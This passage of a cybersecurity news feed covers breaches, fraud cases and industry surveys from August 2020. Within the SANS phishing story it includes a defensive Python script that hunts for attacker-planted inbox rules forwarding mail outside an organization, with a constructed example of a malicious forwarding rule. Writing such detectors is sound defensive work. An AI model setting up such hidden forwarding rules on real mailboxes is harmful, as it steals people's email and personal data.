He noted that universities are potentially particularly vulnerable to ransomware attack because of the varied mix of users connecting into the networks across a wide range of devices, including students’ personal devices.

Furnell added: “In terms of what they ought to be doing to protect themselves, it is essentially the same as other large organizations – ensuring an effective combination of technical safeguards to detect and prevent the incidents, alongside awareness-raising for staff and students in order to reduce the chances of them inadvertently assisting the threat or losing their own data if a breach was to occur.”

Categories: Cyber Risk News

SANS Institute Phishing Attack Leads to Theft of 28,000 Records

Info Security - Wed, 08/12/2020 - 08:16
SANS Institute Phishing Attack Leads to Theft of 28,000 Records

The SANS Institute has revealed that hundreds of emails from an internal account were forwarded to an unknown third party, compromising 28,000 records of personally identifiable information (PII).

The global cybersecurity training and certifications organization said in a statement that the incident came to light on August 6 after a regular review of email configuration identified a “suspicious forwarding rule.”

“This rule was found to have forwarded a number of emails from a specific individual's e-mail account to an unknown external email address,” it continued.

“The forwarded emails included files that contained some subset of email, first name, last name, work title, company name, industry, address, and country of residence. SANS quickly stopped any further release of information from the account.”

In total, 513 emails were forwarded to the external address, exposing 28,000 records of PII. A malicious Office 365 add-on was apparently installed on the victim’s machine as part of the attack.

“We have identified a single phishing e-mail as the vector of the attack,” SANS explained. “As a result of the e-mail, a single employee's email account was impacted. Aside from the affected user, we currently believe that no other accounts or systems at SANS were compromised.”
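The detection that caught this incident was a review of mailbox configuration for forwarding rules that point outside the organization. The following is an added example of that review, not SANS code: it scores inbox rules by the traits an attacker-planted rule tends to have (external or free-webmail target, message deleted or marked read after forwarding, near-empty rule name). The record layout is an assumption, with keys mirroring the parameters Exchange Online’s Get-InboxRule returns (Name, Enabled, ForwardTo, ForwardAsAttachmentTo, RedirectTo, DeleteMessage, MarkAsRead); the internal and webmail domain lists and the sample rules are constructed for the demonstration.

```python
"""Hunt for inbox rules that forward mail out of the organization.

Added example for this page; it is not SANS code. The record layout is an
assumption: each rule is a dict whose keys mirror the parameters Exchange
Online's Get-InboxRule returns (Name, Enabled, ForwardTo,
ForwardAsAttachmentTo, RedirectTo, DeleteMessage, MarkAsRead). The sample
rules at the bottom are constructed for the demonstration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

INTERNAL_DOMAINS = {"example.org"}  # assumption: the organization's own mail domains
# Free webmail providers are a common drop point for forwarded mail (assumed list).
WEBMAIL_DOMAINS = {"gmail.com", "outlook.com", "yahoo.com", "protonmail.com"}
FORWARD_KEYS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")

# Exchange renders recipients as 'Display Name [SMTP:user@domain]' or as bare addresses.
_SMTP_RE = re.compile(r"([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})")


@dataclass
class Finding:
    mailbox: str
    rule: str
    external: list[str]
    reasons: list[str]
    score: int


def extract_addresses(value) -> list[str]:
    """Return every SMTP address in a recipient field (string, list or None)."""
    if not value:
        return []
    items = value if isinstance(value, (list, tuple)) else [value]
    return [m.group(1).lower() for item in items for m in _SMTP_RE.finditer(str(item))]


def is_external(addr: str) -> bool:
    """True unless the address belongs to one of our domains or a subdomain of one."""
    domain = addr.rsplit("@", 1)[-1]
    return not any(domain == d or domain.endswith("." + d) for d in INTERNAL_DOMAINS)


def assess_rule(mailbox: str, rule: dict) -> Finding | None:
    """Score one enabled rule; None when it sends nothing outside the organization."""
    if not rule.get("Enabled", True):
        return None
    targets = [a for key in FORWARD_KEYS for a in extract_addresses(rule.get(key))]
    external = sorted({a for a in targets if is_external(a)})
    if not external:
        return None
    reasons, score = ["forwards or redirects to an external address"], 1
    if any(a.rsplit("@", 1)[-1] in WEBMAIL_DOMAINS for a in external):
        reasons.append("target is a free webmail domain"); score += 1
    # Deleting or marking as read hides the copy from the mailbox owner.
    if rule.get("DeleteMessage"):
        reasons.append("deletes the message after forwarding"); score += 2
    if rule.get("MarkAsRead"):
        reasons.append("marks the message as read"); score += 1
    if len((rule.get("Name") or "").strip()) <= 2:
        reasons.append("near-empty rule name"); score += 1
    return Finding(mailbox, rule.get("Name", ""), external, reasons, score)


def scan(rules_by_mailbox: dict[str, list[dict]]) -> list[Finding]:
    """Assess every rule in every mailbox; highest score first."""
    findings = [f for mbx, rules in rules_by_mailbox.items()
                for rule in rules if (f := assess_rule(mbx, rule))]
    return sorted(findings, key=lambda f: (-f.score, f.mailbox, f.rule))


# Constructed sample data: three mailboxes, four rules.
SAMPLE_RULES = {
    "alice@example.org": [
        {"Name": "Team copy", "Enabled": True,
         "ForwardTo": ["Team [SMTP:team@example.org]"]},
    ],
    "bob@example.org": [
        {"Name": ".", "Enabled": True, "DeleteMessage": True, "MarkAsRead": True,
         "ForwardTo": ["[SMTP:archive.backup.2020@gmail.com]"]},
        {"Name": "Old vendor", "Enabled": False,
         "RedirectTo": ["vendor@partner.example.net"]},
    ],
    "carol@example.org": [
        {"Name": "Invoices", "Enabled": True,
         "ForwardAsAttachmentTo": ["ap@partner.example.net"]},
    ],
}

if __name__ == "__main__":
    for f in scan(SAMPLE_RULES):
        print(f"[{f.score}] {f.mailbox} rule {f.rule!r} -> {', '.join(f.external)}: "
              + "; ".join(f.reasons))
```

Run against the sample, the script reports Bob’s rule first (external webmail target, deletes and marks as read, one-character name) and Carol’s partner forward as a low-score finding for an analyst to confirm; Alice’s internal copy and Bob’s disabled rule produce nothing. In production the same scoring is worth running both on a periodic export of all mailbox rules, as SANS did, and on New-InboxRule/Set-InboxRule audit events so that a newly created external forward is caught within minutes rather than at the next review.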

The firm said its digital forensics team is currently investigating whether any other information was compromised, and to identify any opportunities to build resilience into its defenses and improvements into its incident response for the future.

No passwords or financial information was taken in the attack, and all affected individuals have now been notified, SANS said.

Refreshingly, the organization added that it may run an online session on the incident once the investigation is completed, “if there is information that we think would be useful to the community.”

Infosecurity has reached out to SANS for more information on the incident and will update the story if we hear back.

Categories: Cyber Risk News

Australian Jailed for Stealing XRP Crypto

Info Security - Tue, 08/11/2020 - 17:30
Australian Jailed for Stealing XRP Crypto

An Australian woman has been jailed for her part in the theft of XRP cryptocurrency worth nearly $400,000. 

Kathryn Nguyen was arrested in October 2018 for pulling off a crypto-heist with an associate. The 25-year-old was one of the first people in Australia to be charged with the theft of cryptocurrency.

The theft of 100,000 XRP tokens took place in January 2018, when the value of the currency  was at an all-time high of $3.84 per token. Currently, the tokens are worth approximately $0.30 each. 

Along with her accomplice, Nguyen took over the account of a 56-year-old man who shared her last name, swapped its two-factor authentication to her own cell phone and stole the tokens. 

Nguyen reportedly used a Chinese cryptocurrency exchange to swap the tokens for Bitcoin (BTC). In what may have been an attempt to launder the stolen funds, the Bitcoin was distributed across multiple wallets.

Police raided Nguyen’s home in the Sydney suburb of Epping in 2019, seizing phones, computers, and money. In August last year, the former Bitcoin trader turned handbag and shoe repairer pleaded guilty to fraud.

Today, Nguyen was sentenced to a maximum of two years and three months behind bars. She will be eligible for parole in October 2021. 

Presiding judge Chris Craigie said it was a “difficult and troubling decision” to hand Nguyen a jail sentence. According to News Corp, character references given regarding Nguyen portrayed her as having a “generous and hardworking personality.”

“A common thread was the offender’s willingness to help others,” Craigie said. “This takes on a different meaning in her willingly participating and assisting in a criminal enterprise.”

Craigie shared the opinion that the defendant's “moral judgement was distorted” when she committed the crime. 

The investigation into Nguyen was launched after the victim told police that he had been locked out of his cryptocurrency trading account. Police then spent nearly a year building the case against Nguyen.

Commander of NSW Cybercrime Squad, Detective Superintendent Matthew Craft, said cybercrimes in Australia often went unreported.

“The problem we have nationally—not just in New South Wales—is that the reporting rate for cyber-related crimes is very low,” Craft said.

Categories: Cyber Risk News

Cyber-Harassment Charges Dropped Against Nutley Cop Photo Tweeters

Info Security - Tue, 08/11/2020 - 16:27
Cyber-Harassment Charges Dropped Against Nutley Cop Photo Tweeters

Cyber-harassment charges brought against five people who sought to publicly identify a New Jersey cop on Twitter have been dropped.

The defendants were accused of causing Nutley Police Detective PJ Sandomenico to fear that harm would come to himself, his family, and his property by sharing a photograph of the officer performing his duties at a Black Lives Matter protest on June 26. 

An image of Sandomenico wearing a face mask that read "blue lives matter" was posted on Twitter by Kevin Alfaro of Belleville under the username kevi7 along with the comment "If anyone knows who this b***h is throw his info under this tweet." 

The post was subsequently retweeted by four other people, including Nutley resident Andrew Koslecki; Belleville residents Diana Lubizaca and Kamila Mikulec; and Queens Village, New York, resident Georgana Sziszak. 

Six weeks later, the defendants, all of whom were aged between 18 and 21, received summonses in the mail. If convicted of cyber-harassment in New Jersey, each of the Twitter users could have been slapped with a $10,000 fine and served 18 months in state prison for committing a fourth-degree felony.

Speaking on Friday, August 7, Katherine Carter, a spokeswoman for the prosecutor's office, said: "After reviewing the cases, we concluded there was insufficient evidence to sustain our burden of proof. Consequently, we moved today to dismiss all charges."

After receiving her summons, Sziszak started a GoFundMe page to foot her legal bills and raised nearly $10k. 

Commenting on her decision to re-tweet the post featuring Sandomenico, Sziszak said on her page: "On Friday, June 26, my friend attended a BLM solidarity ride out/protest. At the protest, they were met with anti-BLM counter-protestors; separated by a wall comprised of officers from the Police Department. 

"I physically did not attend this protest but shared my support by RETWEETING his tweet. His tweet was a picture of the cop turning his back and his badge # was NOT VISIBLE. My friend stated that he felt threatened by this cop and attempted to specifically identify this cop via tweeting.  

"The purpose of this tweet was to find out the officer's information, to hold him accountable.”

Categories: Cyber Risk News

Public Sector Outperforming Private in Data Management Although Challenges Remain

Info Security - Tue, 08/11/2020 - 13:30
Public Sector Outperforming Private in Data Management Although Challenges Remain

The public sector is ahead of other industries when it comes to data efficiency and usability, according to a study by Veritas Technologies.

Whilst 30% of the data stored by public sector organizations has a known value, just 15% falls into this category in general industry. In addition, public sector data considered redundant, obsolete and trivial (ROT) is half that of private sector companies.

However, substantial data challenges remain in the public sector, which has the same rate of dark data stored as industry counterparts (50%). This means significant public money is being spent on backing up data with unknown value.

Worryingly, in the survey of 100 public sector IT leaders, more than a quarter (27%) said they never tag data, mainly due to the belief that it is a laborious and expensive process.

Andy Warren, UK&I director, public sector, at Veritas Technologies, commented: “The average survey respondent was spending as much as £696,460 a year on data storage, half of which is dark. Tagging data, as basic as it sounds, is the first step in getting control of it, and can very effectively form the foundation to a program that reduces cost and increases efficiency.”

An apparent reluctance to store data in the cloud could also be holding back efforts to improve data efficiency, with just 17% of public sector information currently held there.

Nevertheless, there is growing awareness of the need to improve data management across the sector; the study found that a high proportion of public sector IT leaders consider increasing internal data visibility (68%) and improved data sharing between teams (59%) to be priorities.

Warren added: “The challenge is real, and so much progress has already been made in the public sector in spite of cost limitations and large swathes of extremely sensitive data. However, provable cost savings can still be realized by consolidating infrastructure, understanding the data estate and deleting what isn’t needed. The technology is now available to reduce costs, improve efficiency and aid compliance.”

Categories: Cyber Risk News

Data Breach at Illinois Healthcare System

Info Security - Tue, 08/11/2020 - 12:57
Data Breach at Illinois Healthcare System

Illinois healthcare system FHN has notified patients of a data breach that took place in February. 

An investigation was launched by the Freeport-based healthcare provider after it transpired that the email accounts of a number of employees had been compromised. 

According to a notice issued by FHN, the alarm was raised when suspicious activity was spotted within the compromised email accounts. FHN responded by securing the accounts and hiring a "leading computer forensic firm" to determine what had occurred. 

The investigation into the incident concluded on April 30 and determined that an unauthorized person accessed the accounts between February 12 and February 13. 

FHN stated: "The investigation was unable to determine whether the unauthorized person actually viewed any emails or attachments in the accounts. Out of an abundance of caution, we reviewed the emails and attachments contained in the email accounts to identify patient information that may have been accessible to the unauthorized person."

After reviewing the emails and attachments that were compromised in the incident, FHN found that sensitive data belonging to some patients had been accessible to the unauthorized third party. 

Information exposed in the data breach included some patients’ names, dates of birth, medical record or patient account numbers, health insurance information, and limited treatment and/or clinical information, such as provider names, diagnoses, and medication information.

In some instances, patients’ health insurance information and/or Social Security numbers were also identified in the compromised email accounts. 

"This incident did not affect all FHN patients, but only those patients whose information was contained in the affected email accounts," stated FHN.

FHN is offering complimentary credit monitoring and identity protection services to those patients whose Social Security numbers and/or drivers’ license numbers were exposed in the incident.

FHN announced on July 31 that patients had been notified of the data breach. The company said it was taking steps to prevent future cyber-incidents. 

"To help prevent something like this from happening in the future, we have reinforced education with our staff regarding how to identify and avoid suspicious emails and are making additional security enhancements to our email environment, including enabling multi-factor authentication," stated FHN.

Categories: Cyber Risk News

British MSPs Apply for Government Furlough Scheme

Info Security - Tue, 08/11/2020 - 11:30
British MSPs Apply for Government Furlough Scheme

UK managed services providers (MSPs) have applied for government financial relief in the wake of the COVID-19 pandemic, with 74% receiving the help they needed.

According to a survey of 500 MSPs by SolarWinds, 45% of UK MSPs have had to furlough staff, and 50% said they had applied for government financial relief.

However, whilst 65% of MSPs do not anticipate making any pricing changes to their managed services package in the long-term, 19% have reduced their services to fit shrinking customer budgets and 13% intend to increase their prices following the pandemic.

The survey also found that the majority of MSPs with revenue of up to $10m did not think it likely they would engage in a merger or acquisition to support expansion. Among MSPs with revenue over $10m, however, 40% said it was likely they would engage in a merger or acquisition, while 37% said it was not likely and 23% said they were not sure.

Colin Knox, vice-president of community, SolarWinds MSP, said the overwhelming majority of MSPs retaining their staff “during a time period characterized by uncertainty is truly heartening.”

He said: “This crisis has re-enforced the value MSPs bring to businesses. Without MSPs as an extension of the team — focused on risk mitigation and business continuity — many businesses would have been lost, and wouldn’t have been able to support remote working on such a vast, immediate scale. The knowledge, expertise, and skillset of MSPs has been crucial in this changing climate. They have truly become essential.”

In an email to Infosecurity, Brian Honan, CEO of BH Consulting, said staff being furloughed is a worrying trend as it may highlight that many MSSPs do not have the financial stability to survive in the long term. He said: “Good security staff may not wish to work for an MSSP that is struggling financially and may seek better job stability elsewhere, leaving lesser skilled staff working in the MSSP. If your company’s security relies on an MSSP provider that is not financially stable you could be facing potential service delivery and service quality issues in the medium to long-term.

“It is also worth noting that criminals could take advantage of an MSSP that is furloughing their staff. Staff that are suffering financially are more susceptible to bribery which criminals will exploit. It can be cheaper and more effective to bribe an insider than it is to hack the organization.”

Honan also raised concerns about the numbers of MSPs that have staff working remotely. “Remember that some of the most sensitive data in an organization could be passed over to an MSSP,” he said. “If an MSSP had moved to a remote working environment then how secure are their remote workers? Many MSSPs traditionally have their operations center physically secured and isolated, both physically and logically, from the rest of their business to ensure the security of their clients’ networks. Can the MSSPs offer the same level of security from the homes of their remote workers?”

He also questioned whether, in the rush to support remote working, those MSSPs have spent enough time and resources ensuring their systems are properly secured for the new work environment.

“Let’s not forget that criminals will look to take advantage of any weakness in a company’s security,” Honan said. “We have seen attacks in the past targeting MSSP providers to use them as a stepping stone to attack the MSSP’s own customers. Alternatively criminals could take advantage of any security holes in the MSSP’s new remote working solution by attacking the MSSP to cover an attack against one or more of its customers.”

Honan also said the market has been flooded with new MSPs who see the opportunity to make money, and the coming months may see some of the smaller and non-security specialist players drop from the field as they face financial difficulties.

Categories: Cyber Risk News

Experts Warn of ‘Consultants’ Promising to Secure Fake COVID Aid

Info Security - Tue, 08/11/2020 - 10:00
Experts Warn of ‘Consultants’ Promising to Secure Fake COVID Aid

US consumer rights experts are warning of a new wave of fraudulent services claiming to help individuals and businesses get free money from government COVID-19 aid programs.

The Better Business Bureau (BBB) claimed that victims can be snared via dishonest social media ads, search results and even recommendations from unwitting friends and family.

If they click through to the scam site, fake ‘consultants’ will promise to secure government aid money where in the past an application may have been denied — for example from the US Small Business Administration.

“To get started, all you have to do is fill out some paperwork. This typically requires sharing sensitive, personal information, such as your full name, home address, and government ID numbers. Next, the ‘consultant’ will ask you for an upfront payment for their services. You may also be required to pay a portion of the government aid funds you receive directly to the company, which they will likely also ask for up front,” the BBB explained.

“Most of the time, these ‘consultants’ don’t really have any special information on government aid programs. Instead, they are simply hoping to get your personal information and an initial payment. Once you’ve paid, the consultant will disappear and the company will become unreachable.”

Victims will not only lose their money but, if they’ve handed over any personal information, may be at risk of follow-on identity fraud, the BBB warned.

The non-profit urged individuals and business owners never to give out personal details to strangers and to beware of promises that sound too good to be true.

It advised would-be applicants to visit government websites direct and, if dealing with a third-party, to research them and their claims thoroughly before proceeding. The BBB has a list of accredited businesses, for example.

Categories: Cyber Risk News